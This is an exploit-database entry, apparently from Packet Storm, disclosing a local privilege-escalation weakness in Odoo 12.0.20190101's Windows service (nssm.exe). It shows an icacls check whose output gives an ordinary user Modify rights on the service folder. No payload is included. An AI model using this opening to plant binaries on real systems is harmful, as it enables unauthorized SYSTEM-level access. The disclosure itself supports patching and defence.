Share
## https://sploitus.com/exploit?id=PACKETSTORM:162539
# Exploit Title: Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path  
# Exploit Author: 1F98D  
# Vendor Homepage: https://www.odoo.com/  
# Software Link: https://nightly.odoo.com/12.0/nightly/windows/odoo_12.0.20190101.exe  
# Tested Version: 12.0.20190101  
# Tested on OS: Windows   
# Step to discover Unquoted Service Path:  
  
C:\> icacls "C:\Program Files (x86)\Odoo 12.0\nssm"  
  
C:\Program Files (x86)\Odoo 12.0\nssm pc-1\user-1:(OI)(CI)(M)  
NT SERVICE\TrustedInstaller:(I)(F)  
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)  
NT AUTHORITY\SYSTEM:(I)(F)  
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)  
BUILTIN\Administrators:(I)(F)  
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)  
BUILTIN\Users:(I)(RX)  
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)  
CREATOR OWNER:(I)(OI)(CI)(IO)(F)  
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)  
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)  
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)  
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)